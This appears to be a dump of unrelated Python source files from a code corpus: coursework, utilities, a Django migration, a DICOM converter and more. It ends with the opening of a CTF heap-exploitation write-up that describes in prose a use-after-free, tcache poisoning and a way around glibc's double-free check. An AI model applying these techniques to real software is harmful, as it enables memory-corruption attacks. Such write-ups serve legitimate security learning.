23,477 | d669e196d5dbef5322f95c63e78bbcd4aecd99e8 | try:
    # On Python 3.11+ the built-in ExceptionGroup exists; referencing it
    # raises NameError on older interpreters, which triggers the backport.
    ExceptionGroup = ExceptionGroup
except NameError: # pragma: no cover
    from exceptiongroup import ExceptionGroup # type: ignore # noqa: F401
|
23,478 | 9270546cad5cc08536a4538eb4ba2bf8e4e59108 | # Creating an Empty Hash Table
# Define a procedure, make_hashtable,
# that takes as input a number, nbuckets,
# and returns an empty hash table with
# nbuckets empty buckets.
def make_hashtable(nbuckets):
    """Return an empty hash table: a list of nbuckets independent empty buckets."""
    buckets = []
    for _ in range(nbuckets):
        buckets.append([])  # a fresh list each iteration, so buckets don't alias
    return buckets
def make_hashtable2(nbuckets):
    # Deliberately broken variant kept for demonstration: list repetition
    # copies the *reference*, so every bucket is the SAME list object and
    # appending to one bucket appears in all of them.
    return [ [] ] * nbuckets
def make_hashtable3(nbuckets):
    """Comprehension-based equivalent of make_hashtable: a fresh list per bucket."""
    return [[] for _ in range(nbuckets)]
# Freshly-made empty tables compare equal regardless of construction method.
assert make_hashtable(5) == make_hashtable2(5) # does not throw error
a = make_hashtable(5)
b = make_hashtable2(5)
assert a == b # no error
# Mutating one bucket exposes the aliasing in make_hashtable2: all of b's
# buckets share one list, so b becomes [[[1]], [[1]], ...] while only
# a[1] changes -- the next assert fails by design, so the prints are
# never reached.
a[1].append([1])
b[1].append([1])
assert a == b # AssertionError
print(a)
print(b)
|
23,479 | e65a61524c7cad5580240b4a1c3a81ec08309112 | #20171656 유성현
#Week4 SoftWare Poject assignment4_1
#재귀함수를 이용하여 팩토리얼 코드를 짬
def factorial(n):
    """Return n! for non-negative n, computed recursively.

    Bug fix: the base case now triggers at n <= 1 so factorial(0) returns 1
    instead of recursing past zero forever (the original only stopped at
    n == 1, so factorial(0) raised RecursionError).
    """
    return 1 if n <= 1 else factorial(n - 1) * n
# Keep prompting until the sentinel -1 is entered; other negative inputs
# get a reminder (in Korean) to enter a non-negative integer.
upper = int(input("Enter a number: "))
while upper != -1:
    if upper >= 0:
        print(str(upper) + "! =", factorial(upper))
    else:
        print("양의 정수를 입력해주세요.")
    upper = int(input("Enter a number: "))
23,480 | 98d1b9954b44fec1d611615d92723e697d5368e8 | """
Examples of invariants
"""
import math
# Invariants for loops
def iterative_factorial(num):
    """
    Iterative method for computing factorial
    """
    result = 1
    count = 0
    # Loop invariant: result == count!
    assert result == math.factorial(count)
    for count in range(1, num + 1):
        result *= count
        assert result == math.factorial(count)
    # On exit count == num (for num > 0), so result == num!
    return result
def merge(list1, list2):
    """
    Merge two sorted lists.
    Returns a new sorted list containing all of the elements that
    are in both list1 and list2.
    This function can be iterative.
    """
    merged = []
    # Loop invariant: merged is always sorted.
    assert merged == sorted(merged)
    pos1, pos2 = 0, 0
    while pos1 < len(list1) and pos2 < len(list2):
        item1, item2 = list1[pos1], list2[pos2]
        if item1 < item2:
            merged.append(item1)
            pos1 += 1
        elif item1 > item2:
            merged.append(item2)
            pos2 += 1
        else:
            # Equal heads: keep one copy from each list.
            merged.append(item1)
            merged.append(item2)
            pos1 += 1
            pos2 += 1
        assert merged == sorted(merged)
    # One list is exhausted; the other's remaining tail is already sorted.
    merged.extend(list1[pos1:])
    merged.extend(list2[pos2:])
    assert merged == sorted(merged)
    return merged
############################################
# Invariants for recursive functions
def recursive_factorial(num):
    """
    Recursive definition of factorial
    """
    # Base case: 0! == 1.
    if num == 0:
        base = 1
        assert base == math.factorial(num)
        return base
    # Recursive case: num! == num * (num - 1)!
    partial = recursive_factorial(num - 1)
    result = num * partial
    assert result == math.factorial(num)
    return result
def merge_sort(list1):
    """
    Sort the elements of list1.
    Return a new sorted list with the same elements as list1.
    This function should be recursive.
    """
    # Base case: zero or one element is already sorted; return a copy.
    if len(list1) <= 1:
        copy = list(list1)
        assert copy == sorted(copy)
        return copy
    # Recursive case: sort each half, then merge them.
    midpoint = len(list1) // 2
    left_sorted = merge_sort(list1[:midpoint])
    right_sorted = merge_sort(list1[midpoint:])
    combined = merge(left_sorted, right_sorted)
    assert combined == sorted(combined)
    return combined
########################################################
# Class invariant
import poc_grid
import poc_queue
import poc_wildfire_gui
# constants
# Cell states used in the wildfire grid: burned vs. unburned.
EMPTY = 0
FULL = 1
class WildFire(poc_grid.Grid):
    """
    Class that models a burning wild fire using a grid and a queue
    The grid stores whether a cell is burned (FULL) or unburned (EMPTY)
    The queue stores the cells on the boundary of the fire
    """
    def __init__(self, grid_height, grid_width):
        """
        Override initializer for Grid, add queue to store boundary of fire
        """
        poc_grid.Grid.__init__(self, grid_height, grid_width)
        self._fire_boundary = poc_queue.Queue()
    def clear(self):
        """
        Set cells to be unburned and the fire boundary to be empty
        """
        poc_grid.Grid.clear(self)
        self._fire_boundary.clear()
    def enqueue_boundary(self, row, col):
        """
        Add cell with index (row, col) the boundary of the fire
        """
        self._fire_boundary.enqueue((row, col))
    def dequeue_boundary(self):
        """
        Remove an element from the boundary of the fire
        """
        return self._fire_boundary.dequeue()
    def boundary_size(self):
        """
        Return the size of the boundary of the fire
        """
        return len(self._fire_boundary)
    def fire_boundary(self):
        """
        Generator for the boundary of the fire
        """
        for cell in self._fire_boundary:
            yield cell
        # alternative syntax
        #return (cell for cell in self._fire_boundary)
    def update_boundary(self):
        """
        Function that spreads the wild fire using one step of BFS
        Updates both the cells and the fire_boundary
        """
        cell = self._fire_boundary.dequeue()
        neighbors = self.four_neighbors(cell[0], cell[1])
        #neighbors = self.eight_neighbors(cell[0], cell[1])
        # Newly ignited neighbors become FULL and join the boundary queue.
        for neighbor in neighbors:
            if self.is_empty(neighbor[0], neighbor[1]):
                self.set_full(neighbor[0], neighbor[1])
                self._fire_boundary.enqueue(neighbor)
        # Check class invariant after update
        assert self.boundary_invariant()
    def boundary_invariant(self):
        """
        Class invariant that checks whether every cell on the
        boundary also has the corresponding grid cell set to FULL
        """
        # NOTE: Python 2 print statement -- this module targets Python 2
        # (CodeSkulptor-style poc_* helper modules).
        for cell in self.fire_boundary():
            if self.is_empty(cell[0], cell[1]):
                print "Cell " + str(cell) + " in fire boundary is empty."
                return False
        return True
def run_examples():
    """
    Run several examples
    """
    # NOTE: Python 2 print statements throughout this function.
    print "iterative_factorial(4) is", iterative_factorial(4)
    print "merge([1, 3, 5, 8], [2, 4, 10]) is", merge([1, 3, 5, 8], [2, 4, 10])
    print "recursive_factorial(4) is", recursive_factorial(4)
    print "merge_sort([4, 2, 1, 4, 6, 7, 2, 1]) is", merge_sort([4, 2, 1, 4, 6,
                                                                 7, 2, 1])
    # run gui to visualize wildfire
    poc_wildfire_gui.run_gui(WildFire(30, 40))
# Executed at import time: runs the demos and opens the GUI.
run_examples()
|
23,481 | bcbc31866c5b86e916c127ee804518a6be045d62 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS224N 2019-20: Homework 5
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
    # Remember to delete the above 'pass' after your implementation
    ### YOUR CODE HERE for part 1g
    """1-D convolution over character embeddings followed by a global max.

    input_channel:  character embedding size (conv in-channels)
    output_channel: word embedding size produced (conv out-channels)
    """
    def __init__(self, input_channel, output_channel, kernel_size=5, padding=1):
        super(CNN, self).__init__()
        self.input_channel = input_channel
        self.output_channel = output_channel
        self.kernel_size = kernel_size
        self.padding = padding
        self.conv = nn.Conv1d(self.input_channel, self.output_channel,
                              self.kernel_size, padding=self.padding)

    def forward(self, x):
        # (batch, char_emb, word_len) -> (batch, out_channels, conv_len)
        conv_out = self.conv(x)
        # Max-pooling with a window spanning the whole conv output is
        # exactly a global max over the last dimension.
        pooled, _ = F.relu(conv_out).max(dim=-1)
        return pooled
    ### END YOUR CODE
### END YOUR CODE
|
23,482 | 4c33f6acd35486b95bac94e46e9480436d14a753 | #!/usr/bin/env python3
# Switch to default branch, pull, and deleted already merged branches. Branches
# are considered already merged, if they contain no commits not already present
# on the default branch, recent release branches, or any custom base branches
# manually specified with the --base flag.
#
# Example usages:
#
# gmp
# gmp --dry-run
# gmp --log=debug
# gmp --base=my-deployed-branch
import logging
import argparse
import subprocess
import sys
class CalledProcessError(subprocess.CalledProcessError):
    """CalledProcessError whose message appends captured stderr, if any."""

    def __str__(self):
        # Bug fix: `"%s" % super()` formatted the super-proxy object itself
        # (e.g. "<super: ...>") instead of the parent's message. Also guard
        # against stderr being None (output not captured), which previously
        # raised AttributeError on .strip().
        base = super().__str__()
        err = self.stderr.strip() if self.stderr else ""
        if not err:
            return base
        return "%s:\n\n%s" % (base, err)
def sh(cmd: str, output=False) -> str:
    """Run the given command in shell mode, and return stdout and stderr
    together as a string.
    If output, then return string will be false, and output will not be
    captured and instead be printed to stdout and stderr.
    Raises CalledProcessError if command returned non-zero exit code.
    """
    logging.debug(f"sh: {cmd}")
    try:
        completed = subprocess.run(
            cmd,
            shell=True,
            text=True,
            capture_output=not output,
            check=True,
        )
    except subprocess.CalledProcessError as exc:
        # Re-raise as our stderr-enriched subclass, dropping the context.
        raise CalledProcessError(**exc.__dict__) from None
    return str(completed.stdout).removesuffix("\n")
def base_branches() -> list[str]:
    """Return branches that should be used as bases to check for branches that
    are already contained within them.
    The first branch in the list is the default branch for the origin remote.
    """
    default_branch = sh("git rev-parse --abbrev-ref origin/HEAD").removeprefix("origin/")
    # The ten most recently committed release branches also count as bases.
    release_lines = sh(
        "git branch --all --sort=-committerdate --list *release/* | head -10"
    ).splitlines()
    cleaned = [name.removeprefix("*").strip() for name in release_lines]
    return [default_branch, *cleaned]
def parse_args() -> argparse.Namespace:
    """Parse command-line flags for the branch-pruning script."""
    parser = argparse.ArgumentParser(description="Process some integers.")
    parser.add_argument(
        "-n", "--dry-run",
        action="store_true",
        help="only print branches to delete",
    )
    parser.add_argument(
        "--log",
        default="info",
        metavar="LEVEL",
        help="log level",
    )
    parser.add_argument(
        "-b", "--base",
        metavar="BRANCH",
        nargs=1,
        action="append",
        help="additional base branches to use",
    )
    return parser.parse_args()
def main(args):
    """Switch to the default branch, pull, then delete local branches that
    contain no commits missing from every base branch."""
    logging.basicConfig(
        format="%(levelname)-6s %(message)-48s %(filename)s:%(lineno)d",
        level=args.log.upper(),
    )
    bases = base_branches()
    logging.debug(f"using base branches: {bases}")
    # In dry-run mode only announce the switch/pull; otherwise perform them.
    if args.dry_run:
        logging.info(f"switching to branch {bases[0]}")
        logging.info("pulling from remote")
    if not args.dry_run:
        sh(f"git switch {bases[0]}", output=True)
        sh(f"git pull --stat", output=True)
    deleted = set()
    for base in bases:
        # Candidate branches already merged into this base, excluding the
        # bases themselves.
        mergable = sh(f"git branch --merged {base}").splitlines()
        mergable = [b.removeprefix("*").strip() for b in mergable]
        mergable = [b for b in mergable if b not in bases]
        for branch in mergable:
            # Count of non-merge commits on the branch but not on base;
            # zero means the branch adds nothing and is safe to delete.
            since = int(sh(f"git rev-list --count --no-merges {base}..{branch}"))
            if since == 0 and branch not in deleted:
                if args.dry_run:
                    # NOTE(review): the extra={"foo": "bar"} looks like
                    # leftover debug data -- confirm and remove.
                    logging.info(
                        f"deleting branch {branch} from {base.removeprefix('remotes/origin/')}",
                        extra={"foo": "bar"},
                    )
                    deleted.add(branch)
                else:
                    sh(f"git branch -D {branch}", output=True)
    return
if __name__ == "__main__":
    args = parse_args()
    try:
        main(args)
    except KeyboardInterrupt:
        # Conventional exit code for SIGINT (128 + 2).
        sys.exit(130)
|
23,483 | 818b8c7b13c79eb938e030dcd55688bf9c4f6bd9 | def gen_f(a, b): # Define a function with two arguments.
    """
    Generator of prime numbers in the range given by the two arguments.
    """
    if a < 2: # Skip 1, since it is not a prime number.
        a = 2
    for i in range(a, b + 1): # Walk every number from a to b inclusive.
        for j in range(2, i): # Look for a divisor among the numbers below i.
            if i % j == 0: # A divisor was found, so i is not prime.
                break # Leave the inner loop and move to the next candidate.
        else:
            yield i # No divisor found: i is prime, so yield it.
# Print the generator's output on a single line, separated by spaces.
for n in gen_f(1, 100):
    print(n, end=' ')
|
23,484 | 271a564cf6e24805a5898a0f3e0140e6b750fac1 | import os
import re
import os.path as op
import numpy as np
import pandas as pd
import nibabel as nib
def locate_peaks(vox_coords):
    """Find most probable region in HarvardOxford Atlas of a vox coord.

    Parameters
    ----------
    vox_coords : iterable of (i, j, k) voxel indices into the 2mm MNI grid.

    Returns
    -------
    pandas.DataFrame with columns ["MaxProb Region", "Prob"], one row per
    input coordinate.
    """
    sub_names = harvard_oxford_sub_names
    ctx_names = harvard_oxford_ctx_names
    # The probabilistic atlases ship with FSL; requires FSLDIR to be set.
    at_dir = op.join(os.environ["FSLDIR"], "data", "atlases")
    ctx_data = nib.load(op.join(at_dir, "HarvardOxford",
                        "HarvardOxford-cort-prob-2mm.nii.gz")).get_data()
    sub_data = nib.load(op.join(at_dir, "HarvardOxford",
                        "HarvardOxford-sub-prob-2mm.nii.gz")).get_data()
    loc_list = []
    for coord in vox_coords:
        coord = tuple(coord)
        # Most probable label (and its probability) in each atlas here.
        ctx_index = np.argmax(ctx_data[coord])
        ctx_prob = ctx_data[coord][ctx_index]
        sub_index = np.argmax(sub_data[coord])
        sub_prob = sub_data[coord][sub_index]
        # Voxel lies outside both atlases entirely.
        if not max(sub_prob, ctx_prob):
            loc_list.append(("Unknown", 0))
            continue
        # Indices 0/11 are L/R cerebral white matter (see
        # harvard_oxford_sub_names); trust them only when the cortical
        # atlas has no opinion at all.
        if not ctx_prob and sub_index in [0, 11]:
            loc_list.append((sub_names[sub_index], sub_prob))
            continue
        # Prefer the subcortical label unless it is cortex / white matter
        # (indices 0, 1, 11, 12), which the cortical atlas handles better.
        if sub_prob > ctx_prob and sub_index not in [0, 1, 11, 12]:
            loc_list.append((sub_names[sub_index], sub_prob))
            continue
        loc_list.append((ctx_names[ctx_index], ctx_prob))
    return pd.DataFrame(loc_list, columns=["MaxProb Region", "Prob"])
def shorten_name(region_name, atlas):
    """Implement regexp sub for verbose Harvard Oxford Atlas region."""
    substitutions = {"ctx": harvard_oxford_ctx_subs,
                     "sub": harvard_oxford_sub_subs}
    # Apply every (pattern, replacement) pair for the chosen atlas in order.
    for pattern, replacement in substitutions[atlas]:
        region_name = re.sub(pattern, replacement, region_name).strip()
    return region_name
def vox_to_mni(vox_coords):
    """Given ijk voxel coordinates, return xyz from image affine."""
    try:
        fsldir = os.environ["FSLDIR"]
    except KeyError:
        raise RuntimeError("vox_to_mni requires FSLDIR to be defined.")
    # Use the affine of the standard MNI template shipped with FSL.
    mni_file = op.join(fsldir, "data/standard/avg152T1.nii.gz")
    aff = nib.load(mni_file).get_affine()
    mni_coords = np.zeros_like(vox_coords)
    for i, coord in enumerate(vox_coords):
        coord = coord.astype(float)
        # Homogeneous transform: [x, y, z] = (A @ [i, j, k, 1])[:3]
        mni_coords[i] = np.dot(aff, np.r_[coord, 1])[:3].astype(int)
    return mni_coords
harvard_oxford_sub_subs = [
("Left", "L"),
("Right", "R"),
("Cerebral Cortex", "Ctx"),
("Cerebral White Matter", "Cereb WM"),
("Lateral Ventrica*le*", "LatVent"),
]
harvard_oxford_ctx_subs = [
("Superior", "Sup"),
("Middle", "Mid"),
("Inferior", "Inf"),
("Lateral", "Lat"),
("Medial", "Med"),
("Frontal", "Front"),
("Parietal", "Par"),
("Temporal", "Temp"),
("Occipital", "Occ"),
("Cingulate", "Cing"),
("Cortex", "Ctx"),
("Gyrus", "G"),
("Sup Front G", "SFG"),
("Mid Front G", "MFG"),
("Inf Front G", "IFG"),
("Sup Temp G", "STG"),
("Mid Temp G", "MTG"),
("Inf Temp G", "ITG"),
("Parahippocampal", "Parahip"),
("Juxtapositional", "Juxt"),
("Intracalcarine", "Intracalc"),
("Supramarginal", "Supramarg"),
("Supracalcarine", "Supracalc"),
("Paracingulate", "Paracing"),
("Fusiform", "Fus"),
("Orbital", "Orb"),
("Opercul[ua][mr]", "Oper"),
("temporooccipital", "tempocc"),
("triangularis", "triang"),
("opercularis", "oper"),
("division", ""),
("par[st] *", ""),
("anterior", "ant"),
("posterior", "post"),
("superior", "sup"),
("inferior", "inf"),
(" +", " "),
("\(.+\)", ""),
]
harvard_oxford_sub_names = [
'L Cereb WM',
'L Ctx',
'L LatVent',
'L Thalamus',
'L Caudate',
'L Putamen',
'L Pallidum',
'Brain-Stem',
'L Hippocampus',
'L Amygdala',
'L Accumbens',
'R Cereb WM',
'R Ctx',
'R LatVent',
'R Thalamus',
'R Caudate',
'R Putamen',
'R Pallidum',
'R Hippocampus',
'R Amygdala',
'R Accumbens']
harvard_oxford_ctx_names = [
'Front Pole',
'Insular Ctx',
'SFG',
'MFG',
'IFG, triang',
'IFG, oper',
'Precentral G',
'Temp Pole',
'STG, ant',
'STG, post',
'MTG, ant',
'MTG, post',
'MTG, tempocc',
'ITG, ant',
'ITG, post',
'ITG, tempocc',
'Postcentral G',
'Sup Par Lobule',
'Supramarg G, ant',
'Supramarg G, post',
'Angular G',
'Lat Occ Ctx, sup',
'Lat Occ Ctx, inf',
'Intracalc Ctx',
'Front Med Ctx',
'Juxt Lobule Ctx',
'Subcallosal Ctx',
'Paracing G',
'Cing G, ant',
'Cing G, post',
'Precuneous Ctx',
'Cuneal Ctx',
'Front Orb Ctx',
'Parahip G, ant',
'Parahip G, post',
'Lingual G',
'Temp Fus Ctx, ant',
'Temp Fus Ctx, post',
'Temp Occ Fus Ctx',
'Occ Fus G',
'Front Oper Ctx',
'Central Oper Ctx',
'Par Oper Ctx',
'Planum Polare',
'Heschl"s G',
'Planum Tempe',
'Supracalc Ctx',
'Occ Pole']
|
23,485 | d3a03677a04afeb0dabb9669c2d49cfb1d0e501e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Класс: Поиск разделителей в строке кода
"""
import re
class RubyOperations:
    """Scan one line of Ruby source code and collect the operators in it."""
    def __init__(self,code,cnt,flag):
        # code: the source line to scan; cnt: running operator counter used
        # as the next dictionary key; flag: True while inside a =begin/=end
        # multi-line comment.
        self._code = code
        self._cnt = cnt
        self._flag = flag
    @property
    def findOperators(self):
        """ Return the operators found in the line self._code as a dictionary """
        # NOTE(review): this property mutates self._code/_cnt/_flag on each
        # access -- confirm callers expect a side-effecting property.
        dictionary={}
        # search templates ('phrases' appears to be unused -- verify)
        ignore =["=>"]
        phrases=[".eql?","equal?","=>"]
        pattern=["===","**","==","+=","-=","*=","/=","**=","%=","!=",">=","<=","<=>",
        ".eql?","equal?","||","&&",">>","<<","^","!","~","<",">","=","+","-","*","/","%"]
        patternCycle="(\s+not\s+)|(\s+and\s+)|(\s+or\s+)|(&&)|([|]+)|(\s*>\s*)"
        # Make sure this is not the start of a multi-line comment.
        if self._code.find("=begin")==0:
            self._flag=True
            return dictionary
        # If the multi-line comment just ended, drop the flag and slice
        # the '=end' marker off.
        if self._code.find("=end")==0 and self._flag:
            self._flag=False
            self._code=self._code[4:]
        # A single-line comment starting the line is ignored entirely.
        indexSharp=self._code.find('#')
        if indexSharp==0:
            return dictionary
        else:
            # Remove tokens that are not operators (hash rockets).
            for i in ignore:
                while(self._code.find(i)!=-1):
                    index=self._code.find(i)
                    self._code=self._code[:index]+self._code[index+len(i):]
            # Search for logical operators.
            lst=re.findall(patternCycle,self._code)
            for i in lst:
                if len(i)!=0:
                    for j in i:
                        # Make sure the matched group is not the empty string.
                        if len(j)!=0:
                            string=j
                            string=string.replace(" ","")
                            string=string.replace("=","")
                            dictionary[self._cnt]=string
                            self._cnt+=1
            # Search for all other operators.
            for i in pattern:
                block=self._code[:]
                cntOp=block.count(i)
                # Quote positions (single and double quotes are equivalent).
                quote = [i for (i, c) in enumerate(block) if c in '\'"']
                # Walk the line until the wanted operators are extracted.
                while(cntOp!=0):
                    NeedWrite=False
                    index=block.find(i)
                    # Line analysis
                    # Step 1: make sure the operator is not inside a string.
                    # Count the quotes appearing before the operator...
                    quotesCnt=0
                    for j in quote:
                        if j<index:
                            quotesCnt+=1
                    # ...then decide how the operator relates to the quotes.
                    if quotesCnt==0 or quotesCnt%2==0: NeedWrite=True # before/after quotes
                    if quotesCnt%2==1: NeedWrite=False # inside quotes
                    # Step 2: cut the operator run out of the text, if it
                    # satisfies the selection rules.
                    string=""
                    start=end=0
                    findOp=afterWord=False
                    for j in range(len(block)):
                        if block[j] in pattern:
                            if findOp==False:
                                findOp=afterWord=True
                                start=j
                            string+=block[j]
                        if (block[j].isalpha() or block[j].isdecimal() or block[j]=="_" or block[j]==" ") and afterWord:
                            end=j
                            break
                    if findOp:
                        if i!=string: NeedWrite=False
                    # Step 3: write the operator into the dictionary.
                    if NeedWrite:
                        dictionary[self._cnt]=i
                        self._cnt+=1
                    # Step 4: adjust the working data.
                    # Slice out the characters that were consumed...
                    block=block[:start]+block[end:]
                    # ...and shift the recorded quote indices accordingly.
                    tmp=[]
                    for j in quote:
                        tmp.append(j-len(string))
                    quote=tmp
                    cntOp-=1
        return dictionary
if __name__ == '__main__':
    # Ad-hoc smoke test on a line mixing operators, quotes and hash rockets.
    string="bar.add('cascade', ** 'menu' => += menu,'label=' === => hello)"
    obj=RubyOperations(string,0,0)
    print(obj.findOperators)
|
23,486 | 258f212eb7fa97871e558b060e66fb3a0a72cd4b | import requests
# Handling Python 2/3 quote_plus import
try:
from urllib.parse import quote_plus
except ImportError:
from urllib import quote_plus
class OpenGraphIO:
    """Small client for the opengraph.io REST API."""

    def __init__(self, options=None):
        """
        Initialize OpenGraphIO instance with required app_id.

        Fix: mutable-default-argument {} replaced by None-sentinel pattern.
        """
        options = {} if options is None else options
        # Throw an error if app_id is not present in options dict
        if 'app_id' not in options:
            raise KeyError('app_id must be supplied when making requests to the API. Get a free app_id by signing up here: https://www.opengraph.io/')
        self.app_id = options['app_id']
        # Assign options if present, or defaults if not
        # These can be overridden when making requests through get_site_info
        self.cache_ok = options.get('cache_ok', True)
        self.full_render = options.get('full_render', False)
        self.version = options.get('version', '1.1')

    def get_site_info_url(self, url, options=None):
        """
        Build the request URL, honoring a per-call 'version' override.
        """
        options = {} if options is None else options
        version = options.get('version', self.version)
        return 'https://opengraph.io/api/' + version + '/site/' + quote_plus(url)

    def get_site_info_query_params(self, options=None):
        """
        Set params for a particular request called with get_site_info.
        """
        options = {} if options is None else options
        # Per-call overrides win; otherwise fall back to instance defaults.
        query_string_values = {
            'app_id': options.get('app_id', self.app_id),
            'cache_ok': options.get('cache_ok', self.cache_ok),
            'full_render': options.get('full_render', self.full_render),
            'version': options.get('version', self.version),
        }
        return query_string_values

    def get_site_info(self, passed_url, options=None):
        """
        Request OpenGraph tags and return the parsed JSON response.
        """
        options = {} if options is None else options
        # Bug fix: options were previously ignored when building the URL, so
        # a per-call 'version' changed the query string but not the API path.
        uri = self.get_site_info_url(passed_url, options)
        params = self.get_site_info_query_params(options)
        response = requests.get(uri, params)
        return response.json()
|
23,487 | e7edf41ec353ba13a445d5b307a1fb8c31509d81 | import torch
def alpha_geodesic(
    a: torch.Tensor,
    b: torch.Tensor,
    alpha: float,
    lmd: float
) -> torch.Tensor:
    r"""
    Compute the $\alpha$-geodesic between two probability distributions
    ``a`` and ``b`` with interpolation weight ``lmd``.
    """
    eps = 1e-12  # keep logs/powers finite for zero entries
    a_s = a + eps
    b_s = b + eps
    if alpha == 1:
        # alpha = 1 limit: weighted geometric mean.
        return torch.exp((1 - lmd) * torch.log(a_s) + lmd * torch.log(b_s))
    if alpha >= 1e+9:
        # alpha -> +inf limit.
        return torch.min(a_s, b_s)
    if alpha <= -1e+9:
        # alpha -> -inf limit.
        return torch.max(a_s, b_s)
    power = (1 - alpha) / 2
    mix = (1 - lmd) * a_s ** power + lmd * b_s ** power
    geo = mix ** (1 / power)
    # Numerical underflow guard for positive alpha.
    if alpha > 0 and (geo == 0).sum() > 0:
        return torch.min(a_s, b_s)
    return geo
|
23,488 | 6c4d79c4223ee31b0f5f636bdfd849c44c6d427f | socks = input()
# Convert the previously-read stdin value to an integer and echo it back.
socks = int(socks)
print(socks)
# Read one line of space-separated tokens; keep both names bound to the list.
data = input().split(' ')
hash = data
print(hash)
|
23,489 | 303826166a1ddf566e97a7e680d03b60658179f1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
    """Initial auto-generated schema for the blog app: Category and Entry.

    NOTE: migration files should stay byte-stable once applied; the frozen
    datetime default and ``b''`` literals below are makemigrations artifacts.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255, verbose_name='name')),
                ('slug', models.SlugField(unique=True, max_length=255, verbose_name='slug')),
                ('class_name', models.CharField(max_length=255, null=True, verbose_name='class name', blank=True)),
                ('creation_date', models.DateTimeField(auto_now_add=True, verbose_name='creation date')),
                ('modification_date', models.DateTimeField(auto_now=True, verbose_name='modification date')),
            ],
            options={
                'verbose_name': 'category',
                'verbose_name_plural': 'categories',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Entry',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=255, verbose_name='title')),
                # Slug uniqueness is scoped to the publication date, not global.
                ('slug', models.SlugField(max_length=255, verbose_name='slug', unique_for_date=b'publication_date')),
                ('pict', models.ImageField(null=True, upload_to=b'img/entries/', blank=True)),
                # Frozen default captured at generation time (auto-generated artifact).
                ('publication_date', models.DateTimeField(default=datetime.datetime(2014, 9, 17, 23, 19, 10, 787418), verbose_name='publication date', db_index=True)),
                ('status', models.IntegerField(default=0, db_index=True, verbose_name='status', choices=[(0, 'Offline'), (1, 'Online')])),
                ('body', models.TextField(verbose_name='body')),
                ('overview', models.TextField()),
                ('author', models.ForeignKey(verbose_name='author', to=settings.AUTH_USER_MODEL)),
                ('category', models.ForeignKey(verbose_name='category', to='blog.Category')),
            ],
            options={
                'verbose_name': 'article',
                'verbose_name_plural': 'articles',
            },
            bases=(models.Model,),
        ),
    ]
|
23,490 | c458531704def9bcb9d533ef999d43d7c452e9b1 | # Takes a list of DICOM files, loops through them and uses dcm4che's dcm2jpg to dump PNG exports using a folder path like /run-name/patient-id/accession-number/seriesNumber-seriesDescription.png
# Run name is there to segment/partition the exports (ie avoid having too many files in one folder)
import sys, os, datetime, pydicom
dicomBase = '/path/to/dicom-files/'
pngBase = '/path/to/png-exports/'
cmdPath = '/path/to/dcm4che-5.23.2/bin/dcm2jpg -F PNG -q 1.0'
if __name__ == '__main__':
    # Local imports: only needed when run as a script.
    import shlex
    import subprocess

    # Two arguments are required (fixed off-by-one: the original tested
    # `< 2` but indexed sys.argv[2]).
    if len(sys.argv) < 3:
        print("USAGE: python dcm2png.py dicom-file-list.txt run-name")
        # e.g. python3 dcm2png.py dicom-file-list.txt run1
        exit()
    listFile = open(sys.argv[1])
    runName = sys.argv[2]
    i = 0
    print(datetime.datetime.now())
    # Loop through the .dcm images listed in the supplied text file.
    for dcmPath in listFile:
        # Open the DICOM, get the attributes that form the export path.
        dcmPath = dcmPath.rstrip('\n')  # remove trailing newline
        dicom = pydicom.dcmread(dcmPath)
        pid = str(dicom.PatientID)
        acn = str(dicom.AccessionNumber)
        seriesDesc = "missing"
        if 'SeriesDescription' in dicom:
            seriesDesc = str(dicom.SeriesDescription)
        seriesNum = "x"
        if 'SeriesNumber' in dicom:
            seriesNum = str(dicom.SeriesNumber)
        # Check series description to eliminate laterals.
        if 'lat' in seriesDesc.lower():
            continue
        # Create the destination folder: /run-name/patient-id/accession-number/
        destinationDir = f'{pngBase}{runName}/{pid}/{acn}/'
        # os.makedirs replaces `os.system('mkdir -p ...')` — no shell, so
        # DICOM-derived path components cannot inject shell commands.
        os.makedirs(destinationDir, exist_ok=True)
        fileName = seriesNum + '-' + seriesDesc.replace(' ','-').replace('(','').replace(')','') + '.png'
        # Convert to PNG without a shell; cmdPath holds the binary plus flags.
        subprocess.run(shlex.split(cmdPath) + [dcmPath, destinationDir + fileName])
        i += 1
        #if( i > 10 ): break
    listFile.close()
    print(datetime.datetime.now())
|
23,491 | 6d3fb6f2c1d993c4a4591a6f3ef0138006b8ddae | # count the number occurrence of a specific character in a string
# Count the occurrences of a specific character in a string.
ch = 'vineet'
srch = 'e'
count = sum(1 for c in ch if c == srch)
print(count)
# Alternative: the built-in str.count method.
print(ch.count('e'))
23,492 | 62cf2dbdfc70874aa228514e96f1324bf3fcc26b | from django import template
from decimal import Decimal
register = template.Library()
@register.filter(name='calc_subtotal')
def calc_subtotal(price, quantity):
    """Template filter: line-item subtotal (price x quantity)."""
    return quantity * price
# Subtotal calculation based on the sale price.
@register.filter(name='calc_subtotal_offer')
def calc_subtotal_offer(sale_price, quantity):
    """Template filter: line-item subtotal using the sale price."""
    return quantity * sale_price
'''
All right, so a super classic ptmalloc CTF pwn, we have an obvious UAF bug:
free does not NULL the stored pointer, so that means we can free any object
any number of times AND we can maintain a writable reference to stale pointers.
With pre libc-2.29, this is super trivial, we can target tcache, get UAFs, tcache
poisoning, done. After libc-2.29 it gets a bit trickier to get around the double
free check, but all that needs is zeroing out the key field, so that's super weak sauce.
Okkkay, so what's the challenge then? Why is it called Onepunch?
Well, damn. We suddenly realize that every allocation is with calloc, so we can't actually
target the tcache! But also, every allocation is forced over the fastbin and below the largebin
limit. So no largebin linking attack or fastbin poisoning by default either. Well what then?
And also, what is that secret command?
Ooops, it looks like we actually _can_ do a malloc, but only to the fixed 535 size and also only if a
counter is 7 or more. What is this counter?
Well damn. This is pointing to an object that is .... immediately freed by the program? What the hell?
Well.. turns out, ptmalloc is a really sneaky bastard. Guess what, not only is the tcache descriptor struct
